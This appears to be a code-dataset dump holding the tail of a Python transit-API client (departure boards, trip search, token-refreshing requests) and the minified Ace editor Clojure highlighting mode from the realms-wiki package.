        return _get_node(response, 'ArrivalBoard', 'Arrival')

    # DEPARTURE BOARD
    def departureboard(self, stop_id, date=None, direction=None):
        """Return the departure board for a stop (departureBoard).

        :param stop_id: id of the stop
        :param date: datetime of the board; defaults to now
        :param direction: optional stop id to filter departures by direction
        """
        date = date if date else datetime.now()
        request_parameters = {
            'id': stop_id,
            'date': date.strftime(DATE_FORMAT),
            'time': date.strftime(TIME_FORMAT)
        }
        if direction:
            request_parameters['direction'] = direction
        response = self._request('departureBoard', **request_parameters)
        return _get_node(response, 'DepartureBoard', 'Departure')

    # TRIP
    def trip(self, origin_id, dest_id, date=None):
        """Return trip suggestions between two stops (trip)."""
        date = date if date else datetime.now()
        response = self._request(
            'trip',
            originId=origin_id,
            destId=dest_id,
            date=date.strftime(DATE_FORMAT),
            time=date.strftime(TIME_FORMAT))
        return _get_node(response, 'TripList', 'Trip')

    def _request(self, service, **parameters):
        """Issue an authenticated GET to *service*, refreshing the token
        when it has expired; raise Error on any non-200 response.

        NOTE(review): parameter values are concatenated without URL
        encoding; values containing '&', '=' or spaces would need quoting.
        """
        urlformat = "{baseurl}/{service}?{parameters}&format=json"
        url = urlformat.format(
            baseurl=API_BASE_URL,
            service=service,
            parameters="&".join([
                "{}={}".format(key, value) for key, value in parameters.items()
            ]))
        if datetime.now() > self._token_expire_date:
            self.update_token()
        headers = {'Authorization': 'Bearer ' + self._token}
        res = requests.get(url, headers=headers)
        if res.status_code == 200:
            return json.loads(res.content.decode('UTF-8'))
        else:
            raise Error('Error: ' + str(res.status_code) +
                        str(res.content))
|
PypiClean
|
/realms-wiki-0.9.3.tar.gz/realms-wiki-0.9.3/realms/static/vendor/ace-builds/src-min/mode-clojure.js
|
define("ace/mode/clojure_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(){var e="* *1 *2 *3 *agent* *allow-unresolved-vars* *assert* *clojure-version* *command-line-args* *compile-files* *compile-path* *e *err* *file* *flush-on-newline* *in* *macro-meta* *math-context* *ns* *out* *print-dup* *print-length* *print-level* *print-meta* *print-readably* *read-eval* *source-path* *use-context-classloader* *warn-on-reflection* + - -> ->> .. / < <= = == > > >= >= accessor aclone add-classpath add-watch agent agent-errors aget alength alias all-ns alter alter-meta! alter-var-root amap ancestors and apply areduce array-map aset aset-boolean aset-byte aset-char aset-double aset-float aset-int aset-long aset-short assert assoc assoc! assoc-in associative? atom await await-for await1 bases bean bigdec bigint binding bit-and bit-and-not bit-clear bit-flip bit-not bit-or bit-set bit-shift-left bit-shift-right bit-test bit-xor boolean boolean-array booleans bound-fn bound-fn* butlast byte byte-array bytes cast char char-array char-escape-string char-name-string char? chars chunk chunk-append chunk-buffer chunk-cons chunk-first chunk-next chunk-rest chunked-seq? class class? clear-agent-errors clojure-version coll? comment commute comp comparator compare compare-and-set! compile complement concat cond condp conj conj! cons constantly construct-proxy contains? count counted? create-ns create-struct cycle dec decimal? declare definline defmacro defmethod defmulti defn defn- defonce defstruct delay delay? deliver deref derive descendants destructure disj disj! dissoc dissoc! distinct distinct? doall doc dorun doseq dosync dotimes doto double double-array doubles drop drop-last drop-while empty empty? ensure enumeration-seq eval even? every? false? 
ffirst file-seq filter find find-doc find-ns find-var first float float-array float? floats flush fn fn? fnext for force format future future-call future-cancel future-cancelled? future-done? future? gen-class gen-interface gensym get get-in get-method get-proxy-class get-thread-bindings get-validator hash hash-map hash-set identical? identity if-let if-not ifn? import in-ns inc init-proxy instance? int int-array integer? interleave intern interpose into into-array ints io! isa? iterate iterator-seq juxt key keys keyword keyword? last lazy-cat lazy-seq let letfn line-seq list list* list? load load-file load-reader load-string loaded-libs locking long long-array longs loop macroexpand macroexpand-1 make-array make-hierarchy map map? mapcat max max-key memfn memoize merge merge-with meta method-sig methods min min-key mod name namespace neg? newline next nfirst nil? nnext not not-any? not-empty not-every? not= ns ns-aliases ns-imports ns-interns ns-map ns-name ns-publics ns-refers ns-resolve ns-unalias ns-unmap nth nthnext num number? odd? or parents partial partition pcalls peek persistent! pmap pop pop! pop-thread-bindings pos? pr pr-str prefer-method prefers primitives-classnames print print-ctor print-doc print-dup print-method print-namespace-doc print-simple print-special-doc print-str printf println println-str prn prn-str promise proxy proxy-call-with-super proxy-mappings proxy-name proxy-super push-thread-bindings pvalues quot rand rand-int range ratio? rational? rationalize re-find re-groups re-matcher re-matches re-pattern re-seq read read-line read-string reduce ref ref-history-count ref-max-history ref-min-history ref-set refer refer-clojure release-pending-sends rem remove remove-method remove-ns remove-watch repeat repeatedly replace replicate require reset! reset-meta! resolve rest resultset-seq reverse reversible? rseq rsubseq second select-keys send send-off seq seq? seque sequence sequential? set set-validator! set? 
short short-array shorts shutdown-agents slurp some sort sort-by sorted-map sorted-map-by sorted-set sorted-set-by sorted? special-form-anchor special-symbol? split-at split-with str stream? string? struct struct-map subs subseq subvec supers swap! symbol symbol? sync syntax-symbol-anchor take take-last take-nth take-while test the-ns time to-array to-array-2d trampoline transient tree-seq true? type unchecked-add unchecked-dec unchecked-divide unchecked-inc unchecked-multiply unchecked-negate unchecked-remainder unchecked-subtract underive unquote unquote-splicing update-in update-proxy use val vals var-get var-set var? vary-meta vec vector vector? when when-first when-let when-not while with-bindings with-bindings* with-in-str with-loading-context with-local-vars with-meta with-open with-out-str with-precision xml-seq zero? zipmap",t="throw try var def do fn if let loop monitor-enter monitor-exit new quote recur set!",n="true false nil",r=this.createKeywordMapper({keyword:t,"constant.language":n,"support.function":e},"identifier",!1," 
");this.$rules={start:[{token:"comment",regex:";.*$"},{token:"keyword",regex:"[\\(|\\)]"},{token:"keyword",regex:"[\\'\\(]"},{token:"keyword",regex:"[\\[|\\]]"},{token:"keyword",regex:"[\\{|\\}|\\#\\{|\\#\\}]"},{token:"keyword",regex:"[\\&]"},{token:"keyword",regex:"[\\#\\^\\{]"},{token:"keyword",regex:"[\\%]"},{token:"keyword",regex:"[@]"},{token:"constant.numeric",regex:"0[xX][0-9a-fA-F]+\\b"},{token:"constant.numeric",regex:"[+-]?\\d+(?:(?:\\.\\d*)?(?:[eE][+-]?\\d+)?)?\\b"},{token:"constant.language",regex:"[!|\\$|%|&|\\*|\\-\\-|\\-|\\+\\+|\\+||=|!=|<=|>=|<>|<|>|!|&&]"},{token:r,regex:"[a-zA-Z_$][a-zA-Z0-9_$\\-]*\\b"},{token:"string",regex:'"',next:"string"},{token:"constant",regex:/:[^()\[\]{}'"\^%`,;\s]+/},{token:"string.regexp",regex:'/#"(?:\\.|(?:\\")|[^""\n])*"/g'}],string:[{token:"constant.language.escape",regex:"\\\\.|\\\\$"},{token:"string",regex:'[^"\\\\]+'},{token:"string",regex:'"',next:"start"}]}};r.inherits(s,i),t.ClojureHighlightRules=s}),define("ace/mode/matching_parens_outdent",["require","exports","module","ace/range"],function(e,t,n){"use strict";var r=e("../range").Range,i=function(){};(function(){this.checkOutdent=function(e,t){return/^\s+$/.test(e)?/^\s*\)/.test(t):!1},this.autoOutdent=function(e,t){var n=e.getLine(t),i=n.match(/^(\s*\))/);if(!i)return 0;var s=i[1].length,o=e.findMatchingBracket({row:t,column:s});if(!o||o.row==t)return 0;var u=this.$getIndent(e.getLine(o.row));e.replace(new r(t,0,t,s-1),u)},this.$getIndent=function(e){var t=e.match(/^(\s+)/);return t?t[1]:""}}).call(i.prototype),t.MatchingParensOutdent=i}),define("ace/mode/clojure",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/clojure_highlight_rules","ace/mode/matching_parens_outdent"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text").Mode,s=e("./clojure_highlight_rules").ClojureHighlightRules,o=e("./matching_parens_outdent").MatchingParensOutdent,u=function(){this.HighlightRules=s,this.$outdent=new 
o};r.inherits(u,i),function(){this.lineCommentStart=";",this.minorIndentFunctions=["defn","defn-","defmacro","def","deftest","testing"],this.$toIndent=function(e){return e.split("").map(function(e){return/\s/.exec(e)?e:" "}).join("")},this.$calculateIndent=function(e,t){var n=this.$getIndent(e),r=0,i,s;for(var o=e.length-1;o>=0;o--){s=e[o],s==="("?(r--,i=!0):s==="("||s==="["||s==="{"?(r--,i=!1):(s===")"||s==="]"||s==="}")&&r++;if(r<0)break}if(!(r<0&&i))return r<0&&!i?this.$toIndent(e.substring(0,o+1)):r>0?(n=n.substring(0,n.length-t.length),n):n;o+=1;var u=o,a="";for(;;){s=e[o];if(s===" "||s===" ")return this.minorIndentFunctions.indexOf(a)!==-1?this.$toIndent(e.substring(0,u-1)+t):this.$toIndent(e.substring(0,o+1));if(s===undefined)return this.$toIndent(e.substring(0,u-1)+t);a+=e[o],o++}},this.getNextLineIndent=function(e,t,n){return this.$calculateIndent(t,n)},this.checkOutdent=function(e,t,n){return this.$outdent.checkOutdent(t,n)},this.autoOutdent=function(e,t,n){this.$outdent.autoOutdent(t,n)},this.$id="ace/mode/clojure"}.call(u.prototype),t.Mode=u})
|
PypiClean
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.